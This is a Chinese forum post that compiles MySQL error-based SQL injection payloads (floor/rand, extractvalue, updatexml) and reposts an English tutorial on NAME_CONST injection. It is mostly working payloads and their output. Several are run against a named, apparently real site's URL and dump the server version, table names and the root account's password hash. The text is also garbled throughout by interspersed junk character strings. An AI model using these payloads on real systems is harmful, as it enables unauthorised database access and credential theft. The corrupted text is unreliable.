|
1、通过floor报错 可以通过如下一些利用代码 and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2))); 举例如下:* K% @4 D! A7 U, \4 g) [, {8 d+ f( p
首先进行正常查询: mysql> select * from article where id = 1;
) l! b& Q9 G: v2 m7 V2 c# _+—-+——-+———+
$ ]2 e8 m% j7 w' l% C| id | title | content |* P `, S$ e+ U" ]7 [+ T/ [
+—-+——-+———+6 E+ N1 n I) C% V
| 1 | test | do it |
4 J$ g# V( v& u' |$ \: T; p+—-+——-+———+ 假如id输入存在注入的话,可以通过如下语句进行报错。 mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);' j, C0 N8 p" f
ERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’ 可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。, a; v& \: @4 n9 @% \
例如我们需要查询管理员用户名和密码: Method1: mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
$ D9 ^# F: G6 s6 ^* t0 hERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ Method2: mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
3 c w7 h3 F4 j8 ]- ~1 U0 jERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ 2、ExtractValue
# j; d/ H+ I U' o测试语句如下 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1))); 实际测试过程 mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–
( r+ [4 n" V; ]- mERROR 1105 (HY000): XPATH syntax error: ’\admin888′ 3、UpdateXml 测试语句 and 1=(updatexml(1,concat(0x3a,(select user())),1)) 实际测试过程 mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’ 2 N" S- X/ d5 C3 e8 h
1 a9 R: I* G7 r" ] D: Q! z
再收集: * J2 U( @& W7 r6 `/ F( H
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c) & {$ S4 s/ X$ ?( ^5 A
3 O- ^$ P5 N( g
Error uplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’' ]# v: p) K; Q& o1 |9 A
9 c& P' G; [; n9 l; N1 l9 j7 Ahttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)
0 t1 n3 @' c& D% \, `7 p( N V* I: R# p; x, ]; R( k
Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′ & A% F4 @0 C1 h* Z2 m' @- j# S
! D0 _, X2 e: B/ ^MYSQL高版本报错注入技巧-利用NAME_CONST注入
1 h+ e2 a2 B7 J" }- @$ AIt's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it. ; C: _/ |6 B0 H4 r3 I9 M( j- X% Q
% s; l* {4 Q U H5 I+ q; F
! k; D/ X; E9 i9 \
相关信息; p. I! \% C) m5 Z5 l0 E2 l
d( [: d, A; [1 n9 R- vNAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.
& `6 p2 Y- P F, E, C
E# n) J Z. R7 y+ m& OCode:
1 x( \% J. ^1 Z5 v- t$ l2 JNAME_CONST(DATA, VALUE)8 `( q3 S+ ?' v2 o, u+ q5 g' \
" [4 G% ^8 k8 ]% ?
Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.
$ o( v* _" n8 X% Z+ m; n* o
+ y2 x# t9 \( U" F+ K/ ?SELECT NAME_CONST('TEST', 1)2 t u0 @2 N8 p+ G- S3 V" o
% |, v- ?6 q& V5 T; i
( } ^, J" p$ p0 O' }% c7 y$ c
h0 e$ S! I7 x|---------------|! V$ ]$ l2 D. [7 D0 j \
| TEST |
; {$ g9 {, Y0 f7 M) M7 a! {| |6 f1 O: }/ w* C6 W
|---------------|$ a/ X, w: x- G( h) T1 P- ~
| 1 |+ Q1 {0 v) @. E7 t4 A6 ^
| |
& y2 x! t2 o9 u6 H; p) i|---------------|
; R8 q; Z* c: m; y
6 n) p7 u; e) R# V, p* q+ g6 d0 {! g; m7 f# r8 R# L
9 P1 C6 X% L+ v. l1 I; B
. T7 Z7 J9 Y% i" z0 |http://dev.mysql.com/doc/refman/5.0/en/m...name-const
( Q7 ~0 V; k4 x! [Intro to MySQL Variables& f2 P& l& X5 c+ x
2 X& k! b, K& _+ ?2 a& vOnce you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.
' O+ I9 c6 o) k& B/ |: F' I9 a3 o8 M2 a" ?
Code:
$ G1 j& y+ w" X/ ?* M* M1 s8 v/ ?4 Xhttp://www.baido.hk/qcwh/content ... ;sid=19&cid=2619 _) V! b) B7 K- P
* W0 @) l4 I9 B% a
3 `, Z6 c& A9 o4 C) ^" r" A7 F y' L W# y: o! D$ ]/ V4 D) @3 b
# N8 ]& y9 E) ^ Y
! B3 U1 \0 v% H" jCode:
% S) a# G7 G$ b8 oand+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--
1 Z5 E0 ?0 b5 d: d. t- [4 i7 J: c
4 P% ]4 y; h/ t( ]VAR = Your MySQL variable.& i, q$ x P4 \0 M1 k* s9 ]
6 [/ ?; n& b0 w0 _; L5 Q4 ?; qMySQL 5.1.3 Server System Variables
# i# ]1 V1 s! D7 j$ V1 n& M: v1 i7 r* t _. N' D) R, b& t" Q
Let's try it out on my site..
4 [7 E. o/ y" H1 s T+ {2 x% r) _
4 t; M+ ^. K% ^Code:
- o' O/ B/ m4 khttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--; A! h* a3 W# ~% }) h2 V9 Y H! J
1 ~" m! F9 L4 A0 N& q* U$ bErroruplicate column name '5.0.27-community-nt'8 a0 U6 n1 N, M0 D, U
1 K, j( _, v& }% }) d+ D% D) G, }. m5 }* U3 g, D
! P* `) J4 c" O
5 D4 j6 B' }, F. J: h( @* N2 D! S
S" n" r: p8 `0 {# q/ w) [4 t2 ^, FNow I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...
# K: J5 z7 ^7 `6 T3 i! I2 _) [ y1 p) Q; U
Data Extraction$ X* G( ~: i P( J8 ~* D
" B9 z0 M( ^" }- e( }3 [1 ~5 v5 g
Code:- Y& }1 R5 I& `# X
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--
0 ]( ]6 e8 T% S+ |) V
0 X& s$ ~% c, j& A4 m/ V8 \& `' T$ \* U; O0 } t
We should get a duplicate column 1 error...
, d0 [8 O9 E9 _5 f. S) X5 I" `
! P! q: e0 x* G) ~3 x! u0 wCode:& F3 x3 k3 ]! h- `; m6 q; i
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--
7 n0 b! C' i. U+ G5 t$ \4 ?! V( v" Q: j! J* f" W- m
Erroruplicate column name '1/ F, n* s6 H* u6 J5 l- t
+ e7 ]' w0 }+ [" A. g# V7 k7 k6 l
& a* g! c7 K3 Y; N) z: J( y! k, O0 F% C7 _2 f. j
7 p0 ?8 J7 v4 ^- z0 {, u9 Y
6 Q8 n- Z! g3 y- t2 c+ T
& D' R3 B' _; h! G) X! P fNow let's get the tables out this bitch..% T' w a! @1 ?& H& Q
3 k" ^6 f1 j# {: C6 w+ _% z
Code:; I# ]3 E. S, `
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--! X- i; V8 Q$ e: i5 f1 P( e
7 l6 B5 h. T" J3 L: j
/ e: L+ o# p* c. @; k
Let's see if it works here, if it does, we can go on and finish the job.
8 h" S9 v9 P& C. f% `
- U7 i2 R/ M& p5 PCode:7 R/ v, n$ i9 N4 N- w+ Y
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--5 o5 y Y# T" h% X
8 f3 _; [8 J; A! w4 Y, `9 A- n r; b- @: j3 R: b4 _
Erroruplicate column name 'com_admanage4 k7 _& s, h3 s! }: {" u# Y
1 P8 V4 H+ e x, ]8 O( K
" Q. ~1 z9 e k# H: b( |3 f" p
! V2 u+ h4 u. A6 \
* e3 s5 V- Y5 T; D3 N; Y2 Q5 {
' [$ |. } p9 X6 I' l3 k& z! g1 b- `) B- V% {- c9 @
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.
) e5 D3 b) q( h$ X& P, p; i' r, Y, k$ ?$ n' G8 k
Let's get the columns out of the user table..
0 |& J4 k" o, a2 Z3 v: o1 c3 U! ]- x% f. R ?5 U
Code:
L" p' V1 f/ Q( |5 [+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--
7 c9 B" D7 p/ y/ y
9 l0 J& X5 Q! r( g% W7 s2 g) A% I' u
So mine looks like this, and I get the duplicate column name 'Host'.1 @3 S3 [' |3 [& ~$ k( ~
1 y! w9 t0 b6 b
Code:
7 S0 Z8 [ O8 v6 D/ k3 d( ~http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--
& } R: r+ L1 \. ?- ~1 n
* ~) q* X) v) z9 `: h0 H }Erroruplicate column name 'Host'
3 D' B+ Z! C7 W# E5 o9 q( Y; u8 ]- u/ u8 [( G
# u5 }* @* [; G- h- P6 M6 ^! T7 v! `; t
0 p" {9 D x8 D
& y; j+ a3 ]* l. F$ K6 v
$ t% w" T5 Z! I
Woot, time to finish this bitch off.
1 S- s6 v7 I3 A: o3 s1 h' Z
4 w& U2 S) [! I& q( pCode:
7 h: V' {. \; k! f+ Z! U+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--" l' l5 m, ~% C0 \: R. s/ ~
% k1 e6 d3 c6 ~7 [! d, L8 x2 D0 |
- v, ^( ^: ?' \9 d- G* [So mine looks like this...
1 m7 V4 `' N. s% z" A5 J: ?) M, }- B
Code:* a& z/ x8 e' [" h. c+ d2 b" ?% Z$ _
http://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--8 ?# _& A; w) R7 I, g& v
" |" [' @% r( G, n" b9 G0 SErroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
8 i0 U U8 s [8 c9 C0 K1 C( @
+ }. f8 u1 ~5 A
" C8 h8 s, E. @1 n3 _ * @6 B+ B0 K* \$ j- m0 G3 b! M
" }) m+ ~7 F$ ~* i. I4 b/ [& x/ x' i8 i' x" z2 I+ W
. g- U4 x% _0 Y \And there we have it, thanks for reading.
1 e9 Q3 n' k4 o$ j5 b. f( u
9 I: N2 _/ X) k" n1 Q. a$ ], J |
发表于 2015-11-11 19:03:37
收藏
支持
反对